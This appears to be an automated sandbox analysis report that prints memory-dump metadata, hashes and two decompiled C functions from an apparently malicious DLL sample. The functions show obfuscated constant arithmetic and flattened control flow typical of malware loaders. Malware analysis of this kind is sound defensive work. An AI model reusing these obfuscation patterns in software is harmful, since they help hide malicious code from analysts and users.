                                                                                                                                                                            0x02f6504d
                                                                                                                                                                            0x02f65055
                                                                                                                                                                            0x02f6505d
                                                                                                                                                                            0x02f6506d
                                                                                                                                                                            0x02f65071
                                                                                                                                                                            0x02f65079
                                                                                                                                                                            0x02f65081
                                                                                                                                                                            0x02f6508d
                                                                                                                                                                            0x02f65090
                                                                                                                                                                            0x02f65094
                                                                                                                                                                            0x02f65099
                                                                                                                                                                            0x02f650a1
                                                                                                                                                                            0x02f650a9
                                                                                                                                                                            0x02f650b1
                                                                                                                                                                            0x02f650b9
                                                                                                                                                                            0x02f650c3
                                                                                                                                                                            0x02f650c7
                                                                                                                                                                            0x02f650cf
                                                                                                                                                                            0x02f650d7
                                                                                                                                                                            0x02f650dc
                                                                                                                                                                            0x02f650e6
                                                                                                                                                                            0x02f650ea
                                                                                                                                                                            0x02f650f2
                                                                                                                                                                            0x02f650fa
                                                                                                                                                                            0x02f65102
                                                                                                                                                                            0x02f6510a
                                                                                                                                                                            0x02f65112
                                                                                                                                                                            0x02f6511a
                                                                                                                                                                            0x02f6511f
                                                                                                                                                                            0x02f65127
                                                                                                                                                                            0x02f6512f
                                                                                                                                                                            0x02f65139
                                                                                                                                                                            0x02f65151
                                                                                                                                                                            0x02f65156
                                                                                                                                                                            0x02f6515c
                                                                                                                                                                            0x02f65169
                                                                                                                                                                            0x02f65171
                                                                                                                                                                            0x02f65179
                                                                                                                                                                            0x02f65181
                                                                                                                                                                            0x02f65189
                                                                                                                                                                            0x02f65191
                                                                                                                                                                            0x02f65199
                                                                                                                                                                            0x02f651a1
                                                                                                                                                                            0x02f651a9
                                                                                                                                                                            0x02f651b1
                                                                                                                                                                            0x02f651b9
                                                                                                                                                                            0x02f651c6
                                                                                                                                                                            0x02f651c7
                                                                                                                                                                            0x02f651cb
                                                                                                                                                                            0x02f651d3
                                                                                                                                                                            0x02f651db
                                                                                                                                                                            0x02f651e3
                                                                                                                                                                            0x02f651eb
                                                                                                                                                                            0x02f651f0
                                                                                                                                                                            0x02f651f5
                                                                                                                                                                            0x02f651fd
                                                                                                                                                                            0x02f6520b
                                                                                                                                                                            0x02f6520f
                                                                                                                                                                            0x02f65217
                                                                                                                                                                            0x02f6521f
                                                                                                                                                                            0x02f65227
                                                                                                                                                                            0x02f6522f
                                                                                                                                                                            0x02f6522f
                                                                                                                                                                            0x02f6523d
                                                                                                                                                                            0x02f652f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65243
                                                                                                                                                                            0x02f65249
                                                                                                                                                                            0x02f652df
                                                                                                                                                                            0x02f652e8
                                                                                                                                                                            0x02f652eb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6524f
                                                                                                                                                                            0x02f6524f
                                                                                                                                                                            0x02f65251
                                                                                                                                                                            0x02f65257
                                                                                                                                                                            0x02f65260
                                                                                                                                                                            0x02f65264
                                                                                                                                                                            0x02f6526c
                                                                                                                                                                            0x02f65271
                                                                                                                                                                            0x02f65293
                                                                                                                                                                            0x02f652a6
                                                                                                                                                                            0x02f652bd
                                                                                                                                                                            0x02f652c2
                                                                                                                                                                            0x02f652c5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f652c5
                                                                                                                                                                            0x02f65251
                                                                                                                                                                            0x02f65249
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6523d
                                                                                                                                                                            0x02f65316
                                                                                                                                                                            0x02f6531b
                                                                                                                                                                            0x02f6531e
                                                                                                                                                                            0x02f65320
                                                                                                                                                                            0x02f65320
                                                                                                                                                                            0x02f65320
                                                                                                                                                                            0x02f65332

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: E$X\2
                                                                                                                                                                            • API String ID: 0-703089088
                                                                                                                                                                            • Opcode ID: 198348a310ef9b595774ca02acc06f7e3c254d3b6db7cae5098ba322c651eaac
                                                                                                                                                                            • Instruction ID: bdbca1e02ca2bb80834d9fbc28137e203dbf1b7680a0aa41af0b47111710f1c8
                                                                                                                                                                            • Opcode Fuzzy Hash: 198348a310ef9b595774ca02acc06f7e3c254d3b6db7cae5098ba322c651eaac
                                                                                                                                                                            • Instruction Fuzzy Hash: 529131715083809BC368CF65D98A91BBBE2FBC4398F544A1DF29696260D3B1CA49CF47
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E02F5DE74() {
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				char _v24;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				intOrPtr _t162;
                                                                                                                                                                            				intOrPtr _t166;
                                                                                                                                                                            				intOrPtr _t168;
                                                                                                                                                                            				void* _t169;
                                                                                                                                                                            				signed int _t171;
                                                                                                                                                                            				signed int _t172;
                                                                                                                                                                            				intOrPtr _t196;
                                                                                                                                                                            				void* _t201;
                                                                                                                                                                            				char _t202;
                                                                                                                                                                            				signed int* _t203;
                                                                                                                                                                            				void* _t205;
                                                                                                                                                                            
                                                                                                                                                                            				_t203 =  &_v92;
                                                                                                                                                                            				_v48 = 0x569f20;
                                                                                                                                                                            				_v48 = _v48 * 0x6b;
                                                                                                                                                                            				_t169 = 0;
                                                                                                                                                                            				_v48 = _v48 ^ 0x2435b753;
                                                                                                                                                                            				_t201 = 0xa773912;
                                                                                                                                                                            				_v36 = 0xa39ca1;
                                                                                                                                                                            				_v36 = _v36 + 0xffff508a;
                                                                                                                                                                            				_v36 = _v36 ^ 0x00aa5884;
                                                                                                                                                                            				_v84 = 0x943e6a;
                                                                                                                                                                            				_v84 = _v84 >> 0xa;
                                                                                                                                                                            				_v84 = _v84 + 0x5d77;
                                                                                                                                                                            				_t171 = 0x78;
                                                                                                                                                                            				_v84 = _v84 * 0xe;
                                                                                                                                                                            				_v84 = _v84 ^ 0x0005cfbb;
                                                                                                                                                                            				_v72 = 0x1e0d0a;
                                                                                                                                                                            				_v72 = _v72 | 0x4cfb6fde;
                                                                                                                                                                            				_v72 = _v72 + 0xffff94ff;
                                                                                                                                                                            				_v72 = _v72 ^ 0x4cfa3edf;
                                                                                                                                                                            				_v80 = 0xa086f6;
                                                                                                                                                                            				_v80 = _v80 << 0x10;
                                                                                                                                                                            				_v80 = _v80 >> 5;
                                                                                                                                                                            				_v80 = _v80 + 0xffff18d5;
                                                                                                                                                                            				_v80 = _v80 ^ 0x0432d7e2;
                                                                                                                                                                            				_v68 = 0xb8dd27;
                                                                                                                                                                            				_v68 = _v68 | 0xebb7bfbf;
                                                                                                                                                                            				_v68 = _v68 ^ 0xebb8c1a9;
                                                                                                                                                                            				_v32 = 0x418b74;
                                                                                                                                                                            				_v32 = _v32 * 0x7e;
                                                                                                                                                                            				_v32 = _v32 ^ 0x2049f6fa;
                                                                                                                                                                            				_v64 = 0x577cf5;
                                                                                                                                                                            				_v64 = _v64 * 0x64;
                                                                                                                                                                            				_v64 = _v64 / _t171;
                                                                                                                                                                            				_v64 = _v64 ^ 0x004a237d;
                                                                                                                                                                            				_v76 = 0x4c7ee;
                                                                                                                                                                            				_v76 = _v76 ^ 0x14a6b669;
                                                                                                                                                                            				_v76 = _v76 << 4;
                                                                                                                                                                            				_v76 = _v76 ^ 0x4a231390;
                                                                                                                                                                            				_v44 = 0xd26523;
                                                                                                                                                                            				_v44 = _v44 | 0x7504cc1f;
                                                                                                                                                                            				_v44 = _v44 ^ 0x75d3d950;
                                                                                                                                                                            				_v88 = 0x7e3e67;
                                                                                                                                                                            				_v88 = _v88 >> 5;
                                                                                                                                                                            				_v88 = _v88 + 0xfffffc49;
                                                                                                                                                                            				_v88 = _v88 >> 0x10;
                                                                                                                                                                            				_v88 = _v88 ^ 0x000c6abf;
                                                                                                                                                                            				_v40 = 0x647ef6;
                                                                                                                                                                            				_v40 = _v40 >> 7;
                                                                                                                                                                            				_v40 = _v40 ^ 0x00028bbb;
                                                                                                                                                                            				_v92 = 0x531e5a;
                                                                                                                                                                            				_v92 = _v92 << 8;
                                                                                                                                                                            				_v92 = _v92 | 0xbedf5cfb;
                                                                                                                                                                            				_v92 = _v92 ^ 0xffdbb821;
                                                                                                                                                                            				_v52 = 0xaf5b7e;
                                                                                                                                                                            				_v52 = _v52 ^ 0x54b2eb64;
                                                                                                                                                                            				_v52 = _v52 >> 3;
                                                                                                                                                                            				_v52 = _v52 ^ 0x0a8e907d;
                                                                                                                                                                            				_v56 = 0x7e69cb;
                                                                                                                                                                            				_t172 = 0x76;
                                                                                                                                                                            				_v56 = _v56 / _t172;
                                                                                                                                                                            				_v56 = _v56 + 0xffff7440;
                                                                                                                                                                            				_v56 = _v56 ^ 0x00047804;
                                                                                                                                                                            				_v60 = 0x4d1deb;
                                                                                                                                                                            				_v60 = _v60 | 0x7db56f6d;
                                                                                                                                                                            				_v60 = _v60 + 0xffff2308;
                                                                                                                                                                            				_v60 = _v60 ^ 0x7dffdcf4;
                                                                                                                                                                            				_t200 = _v28;
                                                                                                                                                                            				_t202 = _v28;
                                                                                                                                                                            				goto L1;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						L1:
                                                                                                                                                                            						_t205 = _t201 - 0xa773912;
                                                                                                                                                                            						if(_t205 > 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t205 == 0) {
                                                                                                                                                                            							_t201 = 0xa19a195;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t201 == 0x6df88bf) {
                                                                                                                                                                            							E02F554B6(_v52, _v56, _v60, _t200);
                                                                                                                                                                            							L25:
                                                                                                                                                                            							return _t169;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t201 == 0x82168a7) {
                                                                                                                                                                            							E02F72B09(_v88, _v24, _v40, _v92);
                                                                                                                                                                            							_t201 = 0x6df88bf;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t201 == 0x88022e2) {
                                                                                                                                                                            							_t196 =  *0x2f76214; // 0x0
                                                                                                                                                                            							E02F6E0F2(_v8 + 1, _t196 + 0x23c, _v76, _v44, _v12);
                                                                                                                                                                            							_t162 =  *0x2f76214; // 0x0
                                                                                                                                                                            							_t203 =  &(_t203[3]);
                                                                                                                                                                            							_t169 = 1;
                                                                                                                                                                            							_t201 = 0x82168a7;
                                                                                                                                                                            							 *((intOrPtr*)(_t162 + 0x24)) = _v16;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t201 != 0xa19a195) {
                                                                                                                                                                            							goto L22;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t202 = E02F5C307();
                                                                                                                                                                            							_t201 = 0xf928839;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t201 == 0xbfd8a94) {
                                                                                                                                                                            						if(E02F5E640(_v32, _v64,  &_v24,  &_v16) == 0) {
                                                                                                                                                                            							_t201 = 0x82168a7;
                                                                                                                                                                            							goto L22;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t201 = 0x88022e2;
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t201 == 0xeffcd22) {
                                                                                                                                                                            						_t201 = 0x6df88bf;
                                                                                                                                                                            						if(_v28 > 2) {
                                                                                                                                                                            							_t166 = E02F6F840( *((intOrPtr*)(_t200 + 8)), _v80,  &_v20, _v68);
                                                                                                                                                                            							_v24 = _t166;
                                                                                                                                                                            							if(_t166 != 0) {
                                                                                                                                                                            								_t201 = 0xbfd8a94;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t201 != 0xf928839) {
                                                                                                                                                                            						goto L22;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t168 = E02F68C7D(_t202, _v36,  &_v28, _v84, _v72);
                                                                                                                                                                            					_t200 = _t168;
                                                                                                                                                                            					_t203 =  &(_t203[3]);
                                                                                                                                                                            					if(_t168 == 0) {
                                                                                                                                                                            						goto L25;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t201 = 0xeffcd22;
                                                                                                                                                                            					goto L1;
                                                                                                                                                                            					L22:
                                                                                                                                                                            				} while (_t201 != 0x8019399);
                                                                                                                                                                            				goto L25;
                                                                                                                                                                            			}




































                                                                                                                                                                            0x02f5de74
                                                                                                                                                                            0x02f5de77
                                                                                                                                                                            0x02f5de8a
                                                                                                                                                                            0x02f5de8e
                                                                                                                                                                            0x02f5de90
                                                                                                                                                                            0x02f5de98
                                                                                                                                                                            0x02f5de9d
                                                                                                                                                                            0x02f5dea5
                                                                                                                                                                            0x02f5dead
                                                                                                                                                                            0x02f5deb5
                                                                                                                                                                            0x02f5debd
                                                                                                                                                                            0x02f5dec2
                                                                                                                                                                            0x02f5ded1
                                                                                                                                                                            0x02f5ded4
                                                                                                                                                                            0x02f5ded8
                                                                                                                                                                            0x02f5dee0
                                                                                                                                                                            0x02f5dee8
                                                                                                                                                                            0x02f5def0
                                                                                                                                                                            0x02f5def8
                                                                                                                                                                            0x02f5df00
                                                                                                                                                                            0x02f5df08
                                                                                                                                                                            0x02f5df0d
                                                                                                                                                                            0x02f5df12
                                                                                                                                                                            0x02f5df1a
                                                                                                                                                                            0x02f5df22
                                                                                                                                                                            0x02f5df2a
                                                                                                                                                                            0x02f5df32
                                                                                                                                                                            0x02f5df3a
                                                                                                                                                                            0x02f5df47
                                                                                                                                                                            0x02f5df4b
                                                                                                                                                                            0x02f5df53
                                                                                                                                                                            0x02f5df60
                                                                                                                                                                            0x02f5df6c
                                                                                                                                                                            0x02f5df70
                                                                                                                                                                            0x02f5df78
                                                                                                                                                                            0x02f5df80
                                                                                                                                                                            0x02f5df88
                                                                                                                                                                            0x02f5df8d
                                                                                                                                                                            0x02f5df95
                                                                                                                                                                            0x02f5df9d
                                                                                                                                                                            0x02f5dfa5
                                                                                                                                                                            0x02f5dfad
                                                                                                                                                                            0x02f5dfb5
                                                                                                                                                                            0x02f5dfba
                                                                                                                                                                            0x02f5dfc2
                                                                                                                                                                            0x02f5dfc7
                                                                                                                                                                            0x02f5dfcf
                                                                                                                                                                            0x02f5dfd7
                                                                                                                                                                            0x02f5dfdc
                                                                                                                                                                            0x02f5dfe4
                                                                                                                                                                            0x02f5dfec
                                                                                                                                                                            0x02f5dff1
                                                                                                                                                                            0x02f5dff9
                                                                                                                                                                            0x02f5e001
                                                                                                                                                                            0x02f5e009
                                                                                                                                                                            0x02f5e011
                                                                                                                                                                            0x02f5e016
                                                                                                                                                                            0x02f5e01e
                                                                                                                                                                            0x02f5e02a
                                                                                                                                                                            0x02f5e02d
                                                                                                                                                                            0x02f5e031
                                                                                                                                                                            0x02f5e039
                                                                                                                                                                            0x02f5e041
                                                                                                                                                                            0x02f5e049
                                                                                                                                                                            0x02f5e051
                                                                                                                                                                            0x02f5e059
                                                                                                                                                                            0x02f5e061
                                                                                                                                                                            0x02f5e065
                                                                                                                                                                            0x02f5e065
                                                                                                                                                                            0x02f5e069
                                                                                                                                                                            0x02f5e069
                                                                                                                                                                            0x02f5e069
                                                                                                                                                                            0x02f5e069
                                                                                                                                                                            0x02f5e06f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e075
                                                                                                                                                                            0x02f5e116
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e116
                                                                                                                                                                            0x02f5e081
                                                                                                                                                                            0x02f5e1f3
                                                                                                                                                                            0x02f5e1fd
                                                                                                                                                                            0x02f5e203
                                                                                                                                                                            0x02f5e203
                                                                                                                                                                            0x02f5e08d
                                                                                                                                                                            0x02f5e105
                                                                                                                                                                            0x02f5e10c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e10c
                                                                                                                                                                            0x02f5e095
                                                                                                                                                                            0x02f5e0c1
                                                                                                                                                                            0x02f5e0d4
                                                                                                                                                                            0x02f5e0d9
                                                                                                                                                                            0x02f5e0e4
                                                                                                                                                                            0x02f5e0e7
                                                                                                                                                                            0x02f5e0e8
                                                                                                                                                                            0x02f5e0ed
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e0ed
                                                                                                                                                                            0x02f5e09d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e0a3
                                                                                                                                                                            0x02f5e0ac
                                                                                                                                                                            0x02f5e0ae
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e0ae
                                                                                                                                                                            0x02f5e09d
                                                                                                                                                                            0x02f5e126
                                                                                                                                                                            0x02f5e1c7
                                                                                                                                                                            0x02f5e1d3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e1d3
                                                                                                                                                                            0x02f5e1c9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e1c9
                                                                                                                                                                            0x02f5e132
                                                                                                                                                                            0x02f5e174
                                                                                                                                                                            0x02f5e179
                                                                                                                                                                            0x02f5e18f
                                                                                                                                                                            0x02f5e194
                                                                                                                                                                            0x02f5e19c
                                                                                                                                                                            0x02f5e1a2
                                                                                                                                                                            0x02f5e1a2
                                                                                                                                                                            0x02f5e19c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e179
                                                                                                                                                                            0x02f5e13a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e153
                                                                                                                                                                            0x02f5e158
                                                                                                                                                                            0x02f5e15a
                                                                                                                                                                            0x02f5e15f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e165
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5e1d8
                                                                                                                                                                            0x02f5e1d8
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: g>~$}#J
                                                                                                                                                                            • API String ID: 0-4030106083
                                                                                                                                                                            • Opcode ID: 95d809c365abfda4750c19f2110ab3d3a126d2b4fef398092c34fec35d206054
                                                                                                                                                                            • Instruction ID: 2e33b85d02b15c6b0739943e57e74bf01a34ea63e6dba0de5796fe430ccb3060
                                                                                                                                                                            • Opcode Fuzzy Hash: 95d809c365abfda4750c19f2110ab3d3a126d2b4fef398092c34fec35d206054
                                                                                                                                                                            • Instruction Fuzzy Hash: 719165728083518FC758CF25D48541BFBE1BB94798F514A2EFA9A97260C3B5CA09CF86
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E02F5E7DE(void* __ecx, void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                            				char _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				unsigned int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				void* _t159;
                                                                                                                                                                            				signed int _t180;
                                                                                                                                                                            				signed int _t189;
                                                                                                                                                                            				signed int _t190;
                                                                                                                                                                            				signed int _t191;
                                                                                                                                                                            				void* _t194;
                                                                                                                                                                            				signed int* _t212;
                                                                                                                                                                            				signed int* _t215;
                                                                                                                                                                            
                                                                                                                                                                            				_t212 = _a8;
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_t211 = _a4;
                                                                                                                                                                            				_push(_t212);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t159);
                                                                                                                                                                            				_v88 = 0xa74a92;
                                                                                                                                                                            				_t215 =  &(( &_v128)[5]);
                                                                                                                                                                            				_v88 = _v88 + 0x6289;
                                                                                                                                                                            				_v88 = _v88 ^ 0x00a7ad1b;
                                                                                                                                                                            				_t194 = 0x98d5ac6;
                                                                                                                                                                            				_v72 = 0xabb696;
                                                                                                                                                                            				_v72 = _v72 + 0xffffe542;
                                                                                                                                                                            				_v72 = _v72 ^ 0x00a9fc0a;
                                                                                                                                                                            				_v120 = 0x8dd565;
                                                                                                                                                                            				_v120 = _v120 + 0xffff1d47;
                                                                                                                                                                            				_v120 = _v120 + 0x56a1;
                                                                                                                                                                            				_v120 = _v120 << 7;
                                                                                                                                                                            				_v120 = _v120 ^ 0x46a17a82;
                                                                                                                                                                            				_v124 = 0x8aacb4;
                                                                                                                                                                            				_t189 = 0x6e;
                                                                                                                                                                            				_v124 = _v124 / _t189;
                                                                                                                                                                            				_v124 = _v124 >> 9;
                                                                                                                                                                            				_v124 = _v124 >> 1;
                                                                                                                                                                            				_v124 = _v124 ^ 0x000ba54e;
                                                                                                                                                                            				_v76 = 0x9f90a6;
                                                                                                                                                                            				_v76 = _v76 | 0x682faec6;
                                                                                                                                                                            				_v76 = _v76 ^ 0x68b53021;
                                                                                                                                                                            				_v80 = 0xfbe8ab;
                                                                                                                                                                            				_v80 = _v80 << 0xc;
                                                                                                                                                                            				_v80 = _v80 ^ 0xbe8fb9cd;
                                                                                                                                                                            				_v84 = 0x1efa1;
                                                                                                                                                                            				_v84 = _v84 >> 3;
                                                                                                                                                                            				_v84 = _v84 ^ 0x0009eae4;
                                                                                                                                                                            				_v92 = 0xb2d03c;
                                                                                                                                                                            				_v92 = _v92 ^ 0x8bcf93b7;
                                                                                                                                                                            				_v92 = _v92 ^ 0x8b76d684;
                                                                                                                                                                            				_v100 = 0x2cdd15;
                                                                                                                                                                            				_v100 = _v100 << 2;
                                                                                                                                                                            				_v100 = _v100 ^ 0x00bdfcd6;
                                                                                                                                                                            				_v104 = 0x2a00e4;
                                                                                                                                                                            				_v104 = _v104 | 0x603c2e46;
                                                                                                                                                                            				_v104 = _v104 + 0xffff11ee;
                                                                                                                                                                            				_v104 = _v104 ^ 0x6032c829;
                                                                                                                                                                            				_v128 = 0xd0d9f9;
                                                                                                                                                                            				_v128 = _v128 + 0x4e1d;
                                                                                                                                                                            				_t190 = 0x14;
                                                                                                                                                                            				_v128 = _v128 * 0x58;
                                                                                                                                                                            				_v128 = _v128 / _t190;
                                                                                                                                                                            				_v128 = _v128 ^ 0x0398a77e;
                                                                                                                                                                            				_v68 = 0x2cfb4c;
                                                                                                                                                                            				_t191 = 0x67;
                                                                                                                                                                            				_v68 = _v68 / _t191;
                                                                                                                                                                            				_v68 = _v68 ^ 0x000f6b94;
                                                                                                                                                                            				_v112 = 0x1ddb62;
                                                                                                                                                                            				_v112 = _v112 + 0x6002;
                                                                                                                                                                            				_v112 = _v112 << 2;
                                                                                                                                                                            				_v112 = _v112 + 0xe88d;
                                                                                                                                                                            				_v112 = _v112 ^ 0x0072622d;
                                                                                                                                                                            				_v116 = 0x4c27f5;
                                                                                                                                                                            				_v116 = _v116 >> 0xb;
                                                                                                                                                                            				_v116 = _v116 | 0x0ee4ea1c;
                                                                                                                                                                            				_v116 = _v116 * 0x4e;
                                                                                                                                                                            				_v116 = _v116 ^ 0x89b93018;
                                                                                                                                                                            				_v108 = 0x73a5e7;
                                                                                                                                                                            				_v108 = _v108 * 0x7d;
                                                                                                                                                                            				_v108 = _v108 >> 1;
                                                                                                                                                                            				_v108 = _v108 << 8;
                                                                                                                                                                            				_v108 = _v108 ^ 0x3c03dbf2;
                                                                                                                                                                            				_v64 = 0x20f8;
                                                                                                                                                                            				_v64 = _v64 >> 0xe;
                                                                                                                                                                            				_v64 = _v64 ^ 0x0009aa09;
                                                                                                                                                                            				_v96 = 0x5991b1;
                                                                                                                                                                            				_v96 = _v96 | 0x807a0890;
                                                                                                                                                                            				_v96 = _v96 << 3;
                                                                                                                                                                            				_v96 = _v96 ^ 0x03d0ebbf;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t194 != 0x8b4e35) {
                                                                                                                                                                            						if(_t194 == 0x2701dd5) {
                                                                                                                                                                            							E02F6CAD5(_v68, _v112, __eflags, _v116, _t211,  &_v60);
                                                                                                                                                                            							_t215 =  &(_t215[3]);
                                                                                                                                                                            							_t194 = 0x8b4e35;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t194 == 0x3d33b80) {
                                                                                                                                                                            								_push(_t194);
                                                                                                                                                                            								_push(_t194);
                                                                                                                                                                            								_t180 = E02F5C5D8(_t212[1]);
                                                                                                                                                                            								_t215 =  &(_t215[3]);
                                                                                                                                                                            								 *_t212 = _t180;
                                                                                                                                                                            								__eflags = _t180;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_t194 = 0x48381f5;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t194 == 0x48381f5) {
                                                                                                                                                                            									E02F522A6(_t212, _v80,  &_v60, _v84);
                                                                                                                                                                            									_t215 =  &(_t215[2]);
                                                                                                                                                                            									_t194 = 0xae51dd8;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t194 == 0x62374bf) {
                                                                                                                                                                            										_t212[1] = E02F65333(_t211);
                                                                                                                                                                            										_t194 = 0x3d33b80;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t194 == 0x98d5ac6) {
                                                                                                                                                                            											_t194 = 0x62374bf;
                                                                                                                                                                            											 *_t212 =  *_t212 & 0x00000000;
                                                                                                                                                                            											_t212[1] = _v88;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t194 != 0xae51dd8) {
                                                                                                                                                                            												goto L16;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												E02F60A90(_v92, _v100, _v104,  &_v60, _v128,  *((intOrPtr*)(_t211 + 0x20)));
                                                                                                                                                                            												_t215 =  &(_t215[4]);
                                                                                                                                                                            												_t194 = 0x2701dd5;
                                                                                                                                                                            												continue;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F6CAD5(_v108, _v64, __eflags, _v96, _t211 + 0x18,  &_v60);
                                                                                                                                                                            					_t215 =  &(_t215[3]);
                                                                                                                                                                            					_t194 = 0x462b9b2;
                                                                                                                                                                            					L16:
                                                                                                                                                                            					__eflags = _t194 - 0x462b9b2;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				L17:
                                                                                                                                                                            				__eflags =  *_t212;
                                                                                                                                                                            				_t158 =  *_t212 != 0;
                                                                                                                                                                            				__eflags = _t158;
                                                                                                                                                                            				return 0 | _t158;
                                                                                                                                                                            			}





























                                                                                                                                                                            0x02f5e7e7
                                                                                                                                                                            0x02f5e7ef
                                                                                                                                                                            0x02f5e7f6
                                                                                                                                                                            0x02f5e7fd
                                                                                                                                                                            0x02f5e7fe
                                                                                                                                                                            0x02f5e800
                                                                                                                                                                            0x02f5e801
                                                                                                                                                                            0x02f5e806
                                                                                                                                                                            0x02f5e80e
                                                                                                                                                                            0x02f5e811
                                                                                                                                                                            0x02f5e81b
                                                                                                                                                                            0x02f5e823
